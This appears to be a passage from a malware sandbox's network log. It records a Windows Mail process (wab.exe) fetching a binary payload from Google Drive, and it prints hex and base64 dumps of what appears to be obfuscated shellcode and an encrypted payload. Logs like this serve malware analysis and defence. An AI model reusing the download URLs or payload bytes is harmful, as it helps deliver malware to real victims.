X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 456672
                                                                      Last-Modified: Thu, 18 Apr 2024 03:07:58 GMT
                                                                      X-GUploader-UploadID: ABPtcPrJ1CDEe7oGf2hkKZqYmEN_nupoRH0Lktd6Azke7BH0aftzRb3DRxUk6ahN2o5EvuJ6jkfynaw2IA
                                                                      Date: Thu, 18 Apr 2024 08:10:58 GMT
                                                                      Expires: Thu, 18 Apr 2024 08:10:58 GMT
                                                                      Cache-Control: private, max-age=0
                                                                      X-Goog-Hash: crc32c=VvL4Xw==
                                                                      Server: UploadServer
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close
                                                                      2024-04-18 08:10:59 UTC4753INData Raw: 36 77 49 42 47 48 45 42 6d 37 75 50 48 42 34 41 36 77 4c 45 6c 2b 73 43 38 42 49 44 58 43 51 45 63 51 47 62 63 51 47 62 75 65 56 48 78 6e 64 78 41 5a 76 72 41 6a 39 77 67 66 48 4e 77 63 6b 4c 63 51 47 62 36 77 49 51 39 59 48 78 4b 49 59 50 66 4f 73 43 71 48 68 78 41 5a 76 72 41 72 2f 56 63 51 47 62 75 74 71 6c 37 4d 37 72 41 6d 66 59 36 77 4c 30 4e 65 73 43 65 39 4e 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 38 6d 2b 4a 46 41 74 78 41 5a 76 72 41 75 57 79 30 65 4a 78 41 5a 76 72 41 71 54 4f 67 38 45 45 36 77 49 47 67 65 73 43 42 79 71 42 2b 54 47 57 61 41 52 38 79 6e 45 42 6d 2b 73 43 6c 75 43 4c 52 43 51 45 36 77 4a 45 64 75 73 43 45 79 69 4a 77 33 45 42 6d 2b 73 43 68 4b 32 42 77 34 77 71 53 77 50 72 41 76 2b 45 63 51 47 62 75 76 32 69 46 4a 6c 78 41 5a 74
                                                                      Data Ascii: 6wIBGHEBm7uPHB4A6wLEl+sC8BIDXCQEcQGbcQGbueVHxndxAZvrAj9wgfHNwckLcQGb6wIQ9YHxKIYPfOsCqHhxAZvrAr/VcQGbutql7M7rAmfY6wL0NesCe9NxAZsxynEBm+sC8m+JFAtxAZvrAuWy0eJxAZvrAqTOg8EE6wIGgesCByqB+TGWaAR8ynEBm+sCluCLRCQE6wJEdusCEyiJw3EBm+sChK2Bw4wqSwPrAv+EcQGbuv2iFJlxAZt
                                                                      2024-04-18 08:10:59 UTC4753INData Raw: 73 4b 58 52 67 7a 70 53 77 64 57 66 52 73 48 69 59 41 43 44 4b 67 78 69 6f 51 6d 75 49 61 4c 52 58 7a 56 4f 52 49 42 6f 62 4a 4a 2b 67 32 39 78 46 69 5a 51 35 2f 4e 44 2b 52 74 47 49 2b 6e 79 6e 35 51 76 48 65 67 76 69 57 55 77 62 33 67 66 74 59 6c 31 2f 36 5a 78 4f 59 41 35 61 2f 67 6c 6f 6f 30 67 73 59 42 6f 64 57 53 59 53 62 39 54 62 51 33 76 4d 51 42 62 61 51 6b 36 61 34 7a 4e 53 48 6f 48 54 61 77 52 4c 56 6e 51 4e 74 31 6d 4c 41 66 6a 37 6f 77 76 44 77 79 65 57 70 45 56 49 42 58 6e 34 5a 39 6d 58 45 38 78 4f 55 42 42 66 6c 74 65 7a 42 55 76 68 71 31 52 47 65 4e 34 7a 77 32 59 31 6e 62 77 4c 34 58 74 68 7a 70 50 79 69 53 62 76 49 58 47 55 34 33 51 6f 37 2b 58 2f 74 73 74 6f 70 62 58 45 61 31 67 45 2f 37 4d 37 55 55 36 77 68 33 45 47 31 67 77 67 43 70
                                                                      Data Ascii: sKXRgzpSwdWfRsHiYACDKgxioQmuIaLRXzVORIBobJJ+g29xFiZQ5/ND+RtGI+nyn5QvHegviWUwb3gftYl1/6ZxOYA5a/gloo0gsYBodWSYSb9TbQ3vMQBbaQk6a4zNSHoHTawRLVnQNt1mLAfj7owvDwyeWpEVIBXn4Z9mXE8xOUBBfltezBUvhq1RGeN4zw2Y1nbwL4XthzpPyiSbvIXGU43Qo7+X/tstopbXEa1gE/7M7UU6wh3EG1gwgCp
                                                                      2024-04-18 08:10:59 UTC440INData Raw: 6d 4d 30 4b 75 63 78 71 71 57 75 7a 53 75 56 30 55 67 54 37 47 38 4e 6a 70 46 38 77 7a 52 57 6e 38 67 54 2b 33 72 4f 77 42 4e 4d 31 32 42 4f 64 37 4b 4a 33 6a 49 6d 76 76 70 43 4d 61 31 57 4b 55 7a 44 74 38 6d 2b 7a 61 44 42 66 49 47 64 49 4a 33 2f 30 58 71 45 2f 4e 51 54 53 42 4f 69 6d 7a 38 59 45 58 79 41 77 2b 56 59 69 42 4f 64 39 4c 76 39 55 30 53 77 49 6a 55 56 74 5a 6d 76 44 6a 48 79 44 4b 50 63 4f 4f 54 68 4d 55 39 36 59 31 2b 30 36 35 47 68 31 37 4c 31 49 6d 71 6f 6b 46 66 53 46 52 61 4b 44 69 6f 41 4b 47 39 43 47 48 50 2b 72 32 4f 54 34 63 42 58 49 65 47 6e 67 6c 67 6d 30 70 6e 67 51 57 68 42 75 55 42 54 6d 46 58 72 46 6a 4e 36 6d 33 59 4f 39 39 2f 53 68 35 6d 73 66 58 75 6c 71 38 71 75 6c 35 39 53 75 55 46 31 54 59 5a 50 66 44 5a 32 31 36 62 4d
                                                                      Data Ascii: mM0KucxqqWuzSuV0UgT7G8NjpF8wzRWn8gT+3rOwBNM12BOd7KJ3jImvvpCMa1WKUzDt8m+zaDBfIGdIJ3/0XqE/NQTSBOimz8YEXyAw+VYiBOd9Lv9U0SwIjUVtZmvDjHyDKPcOOThMU96Y1+065Gh17L1ImqokFfSFRaKDioAKG9CGHP+r2OT4cBXIeGnglgm0pngQWhBuUBTmFXrFjN6m3YO99/Sh5msfXulq8qul59SuUF1TYZPfDZ216bM
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 54 58 56 31 77 4b 78 61 6d 6c 57 71 6d 6b 5a 43 33 4f 63 6d 39 62 37 6c 55 6a 48 61 49 4a 44 33 59 34 71 67 53 74 33 7a 2f 41 49 72 71 30 32 73 74 33 76 2f 71 79 78 66 4f 64 76 63 51 42 6f 62 33 45 41 61 47 39 78 41 47 68 76 63 51 42 4e 53 4d 49 76 6a 63 36 61 70 2f 34 54 4c 2f 76 7a 71 66 56 72 46 4e 54 46 6b 32 2b 58 65 50 65 36 79 53 75 72 68 6b 46 54 62 52 75 76 4d 51 42 48 77 7a 35 74 31 63 38 4d 74 69 6a 67 4b 2b 41 56 32 6b 37 36 6d 49 38 4d 71 46 68 33 5a 70 58 48 77 47 59 74 74 6f 38 4b 74 47 48 50 36 75 41 5a 36 6b 50 79 31 4c 74 57 49 68 42 74 50 53 63 78 7a 67 65 64 71 57 71 6a 56 74 46 51 69 6e 66 46 52 67 6b 2f 62 69 75 6c 74 78 32 59 6c 4b 37 67 70 30 35 77 72 4b 41 2b 68 6f 67 58 76 4f 53 68 4e 2b 36 69 33 56 56 49 42 64 53 34 4e 72 6e 6f
                                                                      Data Ascii: TXV1wKxamlWqmkZC3Ocm9b7lUjHaIJD3Y4qgSt3z/AIrq02st3v/qyxfOdvcQBob3EAaG9xAGhvcQBNSMIvjc6ap/4TL/vzqfVrFNTFk2+XePe6ySurhkFTbRuvMQBHwz5t1c8MtijgK+AV2k76mI8MqFh3ZpXHwGYtto8KtGHP6uAZ6kPy1LtWIhBtPScxzgedqWqjVtFQinfFRgk/biultx2YlK7gp05wrKA+hogXvOShN+6i3VVIBdS4Nrno
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 36 61 70 31 6f 31 34 38 54 7a 64 34 68 53 6d 50 4f 63 48 6a 44 78 74 71 4e 41 75 4f 4c 4a 78 79 66 63 76 41 70 66 52 58 67 6c 79 71 57 49 74 2f 37 42 64 70 78 77 71 4a 79 50 31 52 4e 72 6b 4a 57 65 77 77 44 79 55 52 71 74 74 37 69 72 36 79 46 63 66 68 35 2f 75 73 7a 77 79 65 37 6e 68 58 49 42 50 6b 43 36 68 45 54 77 79 57 4b 58 71 52 59 42 58 39 35 68 45 2b 75 35 59 69 45 4b 38 39 35 77 6c 66 62 4d 4d 47 58 37 79 74 73 62 48 41 47 4e 41 58 48 6b 65 66 70 48 59 7a 49 34 4f 42 78 76 48 4f 41 64 61 6d 55 69 61 69 43 54 4e 78 51 47 68 37 58 7a 65 70 66 67 79 4e 48 30 63 64 6f 47 55 76 6d 44 32 31 2b 78 59 69 45 43 38 78 5a 7a 48 68 42 4a 32 76 73 66 72 54 73 73 66 35 6b 54 67 76 4d 56 79 36 71 68 45 44 55 7a 45 56 57 71 62 4d 41 50 4f 52 76 56 2f 37 56 6b 64
                                                                      Data Ascii: 6ap1o148Tzd4hSmPOcHjDxtqNAuOLJxyfcvApfRXglyqWIt/7BdpxwqJyP1RNrkJWewwDyURqtt7ir6yFcfh5/uszwye7nhXIBPkC6hETwyWKXqRYBX95hE+u5YiEK895wlfbMMGX7ytsbHAGNAXHkefpHYzI4OBxvHOAdamUiaiCTNxQGh7XzepfgyNH0cdoGUvmD21+xYiEC8xZzHhBJ2vsfrTssf5kTgvMVy6qhEDUzEVWqbMAPORvV/7Vkd
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 6f 62 33 45 41 61 47 39 53 65 6f 54 54 55 62 4b 72 78 69 33 33 54 6d 71 46 63 48 59 47 48 55 65 4d 47 62 58 69 75 79 6c 66 71 76 76 39 77 48 70 7a 74 58 41 41 53 67 34 2b 41 43 68 76 5a 53 35 65 44 65 61 33 49 7a 63 63 48 4e 47 69 47 65 32 65 54 44 70 36 6b 69 50 76 49 69 5a 35 6c 4d 39 6f 2f 38 41 44 49 33 78 45 43 76 49 62 77 48 4b 58 30 46 39 59 75 38 5a 71 66 64 61 62 78 42 5a 72 72 77 4e 4e 61 47 39 78 41 47 68 76 63 51 42 6f 62 33 45 41 61 47 39 78 49 56 38 30 59 48 54 47 4a 61 52 79 77 75 58 6a 77 6a 77 4e 6f 6b 64 47 7a 56 62 4a 30 2f 73 66 51 45 76 6a 63 47 41 55 50 5a 67 6e 33 30 38 42 62 52 33 37 4f 4a 57 50 54 51 6a 41 4b 34 67 51 4d 50 53 71 38 79 44 4a 33 6d 30 76 4e 70 35 61 72 71 59 37 4a 77 32 42 75 66 39 76 70 79 6f 34 72 79 53 62 30 44
                                                                      Data Ascii: ob3EAaG9SeoTTUbKrxi33TmqFcHYGHUeMGbXiuylfqvv9wHpztXAASg4+AChvZS5eDea3IzccHNGiGe2eTDp6kiPvIiZ5lM9o/8ADI3xECvIbwHKX0F9Yu8ZqfdabxBZrrwNNaG9xAGhvcQBob3EAaG9xIV80YHTGJaRywuXjwjwNokdGzVbJ0/sfQEvjcGAUPZgn308BbR37OJWPTQjAK4gQMPSq8yDJ3m0vNp5arqY7Jw2Buf9vpyo4rySb0D
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 66 36 66 65 64 50 46 76 41 39 4e 31 46 78 4b 55 78 66 50 77 38 32 5a 4b 77 71 66 6b 45 30 4d 4d 35 48 46 38 67 52 6a 79 66 44 4e 69 62 55 2f 4d 48 6e 6e 34 54 56 45 58 44 57 4a 50 76 4e 69 42 58 52 47 66 4d 51 6b 58 72 2f 38 61 72 49 43 69 48 7a 37 44 57 48 6d 34 4f 49 71 6a 44 6a 50 30 71 64 6f 64 6b 47 59 2b 44 79 42 31 2f 38 68 76 6e 4b 46 36 38 43 38 6f 65 6d 53 59 57 73 6e 70 6a 51 56 73 71 4b 50 30 44 6f 62 33 4c 78 70 43 77 78 41 47 68 76 63 51 42 6f 62 33 45 41 61 47 39 78 41 47 68 50 31 41 52 54 54 6c 58 55 78 65 73 35 4a 51 6b 79 75 42 42 6c 41 51 56 6d 46 55 30 55 55 2b 6a 76 63 53 37 42 39 65 46 77 47 30 64 70 5a 62 70 38 45 62 31 37 66 6b 4b 33 56 5a 47 76 78 46 33 30 66 32 4c 58 65 4d 75 35 73 50 65 50 50 44 34 5a 66 51 52 6d 50 66 79 78 33
                                                                      Data Ascii: f6fedPFvA9N1FxKUxfPw82ZKwqfkE0MM5HF8gRjyfDNibU/MHnn4TVEXDWJPvNiBXRGfMQkXr/8arICiHz7DWHm4OIqjDjP0qdodkGY+DyB1/8hvnKF68C8oemSYWsnpjQVsqKP0Dob3LxpCwxAGhvcQBob3EAaG9xAGhP1ARTTlXUxes5JQkyuBBlAQVmFU0UU+jvcS7B9eFwG0dpZbp8Eb17fkK3VZGvxF30f2LXeMu5sPePPD4ZfQRmPfyx3
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 63 72 46 4d 64 46 36 4c 62 56 45 65 33 78 49 55 33 68 71 4c 56 5a 4f 58 48 46 79 36 53 64 31 55 58 45 50 4e 4f 52 6c 77 4a 48 6f 78 6a 49 78 70 4f 30 4c 74 52 75 7a 71 53 6f 66 77 34 4f 73 61 34 48 30 70 69 76 57 57 4a 4a 38 61 4c 74 4d 74 73 35 56 75 56 46 2f 38 41 49 37 44 2f 34 37 58 77 79 71 64 33 67 4e 47 62 41 51 6f 4b 4d 31 54 50 6b 42 6a 54 30 48 63 45 77 78 75 43 74 33 48 68 45 2f 35 50 30 61 58 4c 66 4f 36 67 67 6f 31 73 6b 41 66 47 50 54 61 63 6b 32 46 6f 50 34 66 79 6b 54 75 56 50 6a 43 57 39 78 41 45 62 72 4d 35 37 64 6c 56 31 59 61 57 39 43 42 35 34 78 6f 48 4f 74 61 47 4a 74 76 4e 67 34 74 6f 71 41 32 6d 53 58 6a 6e 41 32 62 78 68 7a 6a 51 48 41 57 63 46 4e 76 44 42 7a 54 74 75 66 70 72 41 36 68 52 54 33 33 6c 35 2b 45 73 35 71 78 4b 30 38
                                                                      Data Ascii: crFMdF6LbVEe3xIU3hqLVZOXHFy6Sd1UXEPNORlwJHoxjIxpO0LtRuzqSofw4Osa4H0pivWWJJ8aLtMts5VuVF/8AI7D/47Xwyqd3gNGbAQoKM1TPkBjT0HcEwxuCt3HhE/5P0aXLfO6ggo1skAfGPTack2FoP4fykTuVPjCW9xAEbrM57dlV1YaW9CB54xoHOtaGJtvNg4toqA2mSXjnA2bxhzjQHAWcFNvDBzTtufprA6hRT33l5+Es5qxK08
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 75 34 7a 51 48 59 67 53 71 69 59 7a 2b 6c 4e 46 6b 47 39 62 2f 6d 62 6c 51 69 55 68 58 32 76 79 42 6e 77 74 52 78 67 4b 74 47 73 42 48 59 77 78 69 74 69 72 55 48 55 6d 75 7a 6d 53 6e 46 78 33 33 66 6a 59 5a 63 56 41 63 31 39 4c 34 32 77 43 50 34 38 38 43 56 59 47 67 43 53 62 65 69 68 76 74 71 42 4c 2b 5a 76 36 4c 72 36 79 70 7a 4f 64 41 73 31 41 4c 2f 69 72 39 42 6a 78 4a 54 65 7a 61 62 58 68 61 6a 5a 6e 79 76 50 34 39 30 46 79 55 37 47 39 57 31 6d 71 45 39 57 4d 66 46 4b 65 64 6d 6a 49 6f 72 5a 59 61 34 68 59 62 52 41 34 44 47 77 72 57 52 69 39 44 65 49 6c 44 7a 41 4a 52 35 2f 78 35 4c 79 42 68 52 39 72 35 64 46 38 71 6f 66 53 44 41 67 56 71 41 57 49 36 5a 4e 47 6f 30 39 4e 41 38 37 49 44 6f 72 75 33 52 57 37 39 34 53 5a 6b 72 61 4e 48 34 6b 35 54 53 38
                                                                      Data Ascii: u4zQHYgSqiYz+lNFkG9b/mblQiUhX2vyBnwtRxgKtGsBHYwxitirUHUmuzmSnFx33fjYZcVAc19L42wCP488CVYGgCSbeihvtqBL+Zv6Lr6ypzOdAs1AL/ir9BjxJTezabXhajZnyvP490FyU7G9W1mqE9WMfFKedmjIorZYa4hYbRA4DGwrWRi9DeIlDzAJR5/x5LyBhR9r5dF8qofSDAgVqAWI6ZNGo09NA87IDoru3RW794SZkraNH4k5TS8
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 50 57 75 38 51 6c 52 4b 75 4c 62 30 68 50 53 31 75 67 43 52 72 36 6c 51 43 45 77 4e 6a 66 31 6a 74 63 54 4e 66 4b 65 6a 6a 47 31 56 4d 68 76 62 38 32 4a 51 72 51 45 42 38 45 4a 6e 51 57 79 43 79 44 41 4a 6f 30 65 65 53 43 74 4b 65 67 36 68 72 36 49 42 6f 62 33 45 41 61 47 39 78 41 47 68 76 63 51 42 6f 62 31 4e 4f 48 6f 2b 78 66 56 46 54 33 38 49 36 64 44 7a 51 61 4c 7a 6a 4c 61 72 48 51 76 6e 50 6f 6b 4d 55 68 71 52 73 70 6c 72 50 44 65 35 65 65 4f 6d 67 46 4c 59 77 71 4a 52 50 41 63 4f 2b 53 64 6a 55 54 30 30 4a 41 43 35 49 50 33 57 33 36 77 61 31 51 4d 73 34 2f 32 47 52 36 31 4c 5a 64 2b 49 6f 4f 73 52 52 34 4f 56 4a 7a 59 61 41 45 32 74 71 6c 58 33 42 71 39 46 57 53 6a 43 63 53 4d 4b 4f 58 4c 6c 2f 4d 50 36 56 4f 77 41 6f 62 30 41 41 43 67 41 41 43 67
                                                                      Data Ascii: PWu8QlRKuLb0hPS1ugCRr6lQCEwNjf1jtcTNfKejjG1VMhvb82JQrQEB8EJnQWyCyDAJo0eeSCtKeg6hr6IBob3EAaG9xAGhvcQBob1NOHo+xfVFT38I6dDzQaLzjLarHQvnPokMUhqRsplrPDe5eeOmgFLYwqJRPAcO+SdjUT00JAC5IP3W36wa1QMs4/2GR61LZd+IoOsRR4OVJzYaAE2tqlX3Bq9FWSjCcSMKOXLl/MP6VOwAob0AACgAACg


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.64971064.233.185.1384437068C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 08:11:43 UTC216OUTGET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: drive.google.com
                                                                      Cache-Control: no-cache
                                                                      2024-04-18 08:11:43 UTC1582INHTTP/1.1 303 See Other
                                                                      Content-Type: application/binary
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 18 Apr 2024 08:11:43 GMT
                                                                      Location: https://drive.usercontent.google.com/download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                      Content-Security-Policy: script-src 'nonce-6BXt2lSu1_y_d2VbOzQaGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Server: ESF
                                                                      Content-Length: 0
                                                                      X-XSS-Protection: 0
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      X-Content-Type-Options: nosniff
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.64971174.125.138.1324437068C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 08:11:44 UTC258OUTGET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Cache-Control: no-cache
                                                                      Host: drive.usercontent.google.com
                                                                      Connection: Keep-Alive
                                                                      2024-04-18 08:11:45 UTC4752INHTTP/1.1 200 OK
                                                                      X-GUploader-UploadID: ABPtcPrfdEDa2vI0OVmTLscil7sFSycrjox1T_z88X0zR1QhpHQ9cgiJVH_q0j1detOPUNHfE51X_fAHBA
                                                                      Content-Type: application/octet-stream
                                                                      Content-Security-Policy: sandbox
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                      X-Content-Security-Policy: sandbox
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                      Cross-Origin-Resource-Policy: same-site
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Disposition: attachment; filename="ajsWqv135.bin"
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Credentials: false
                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 244800
                                                                      Last-Modified: Thu, 18 Apr 2024 03:05:33 GMT
                                                                      Date: Thu, 18 Apr 2024 08:11:45 GMT
                                                                      Expires: Thu, 18 Apr 2024 08:11:45 GMT
                                                                      Cache-Control: private, max-age=0
                                                                      X-Goog-Hash: crc32c=tXduBw==
                                                                      Server: UploadServer
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close
                                                                      2024-04-18 08:11:45 UTC4752INData Raw: 21 d0 ba b4 77 7c 57 95 24 b2 8c 38 84 fd 1e 04 91 7b ba 67 ae 59 fa aa a2 4f cb f4 42 f7 8c b2 5c 83 b3 e0 46 b9 54 d4 d0 f2 11 7f 26 1d e6 bc dd 06 4a 80 7a 16 c7 80 2a 9e 01 f7 6e 9b ca 18 f3 4a 30 f2 66 40 4c f2 d1 21 e7 0e 02 44 78 5b ed ca a2 17 6a 4a 6c 0e 3c d1 30 d2 57 63 5b f3 ba 7f 67 b3 c9 ba 60 09 ee 19 75 93 ec 6b 12 a4 de 8a 95 bd 51 de 8f d4 33 b4 6e d0 61 30 98 9b 13 0a 8c 2a f8 5c 98 da 05 8a c5 ec d5 0a bf a9 6a 95 25 95 75 b2 bf 66 57 5e 8d b6 c4 33 09 4d 34 72 03 ca d3 24 49 77 2e 53 bc 91 6d c1 63 14 79 ac 29 72 36 ea 2f 2c de 77 2c 11 98 90 61 d6 56 37 2f b3 e6 9e 00 54 1c da dc 0e 02 77 23 da ca 3a fc a1 72 3f 4c 05 2e a9 0b c0 26 36 ea 1a 9e b4 ef 9e 6c a8 e6 f6 5d c4 07 de c2 86 d6 56 f1 9f f7 a9 ae c5 cb 4f aa ed 72 7c 8b 39 77
                                                                      Data Ascii: !w|W$8{gYOB\FT&Jz*nJ0f@L!Dx[jJl<0Wc[g`ukQ3na0*\j%ufW^3M4r$Iw.Smcy)r6/,w,aV7/Tw#:r?L.&6l]VOr|9w
                                                                      2024-04-18 08:11:45 UTC4752INData Raw: 41 94 10 a0 f4 5c 30 b3 0d 2a 01 e3 0e fd bb 86 55 55 ca a2 e9 66 4a 6c 2e 70 d1 30 d2 a9 62 62 e0 ba 7f 67 cd ca ba 60 0d 81 47 75 93 ea 4b 1f a4 de 8a 6b b3 51 de 8f 2a 3f b4 6e f0 e0 30 98 9b e3 14 0f 2a f8 e8 91 3f 2c 30 c4 a6 38 29 eb c1 03 18 0b e5 07 dd 26 18 36 33 8d df a5 5d 67 dc 41 6b 72 af f3 56 42 16 0e 3a d6 88 ab 8e 30 34 34 c8 4d 17 18 19 2c 26 fa 77 d2 1d 98 90 41 de 06 72 2f 4d ab a6 10 54 74 90 b9 3a 02 77 25 5a c8 3a fc a5 b2 36 4e 04 25 56 0e c0 26 84 17 16 9e bc cf 9a 6c a8 e6 08 92 2d 0a de c2 a6 fe 42 f1 7f fe 89 ab c5 8b 4f 54 c3 72 7c 8b c5 7b 31 fa f9 a0 5f 68 63 96 5a be 5c 1c cd 9a a6 a0 2a e4 31 0f 76 1a 44 85 2b 51 35 fb 30 b3 f4 49 2f f6 81 d6 5e d0 e5 93 7a 0d 5b 43 27 a9 29 ca e1 7d 73 13 9f a5 3d e8 d7 a3 9b 9d 64 27 69
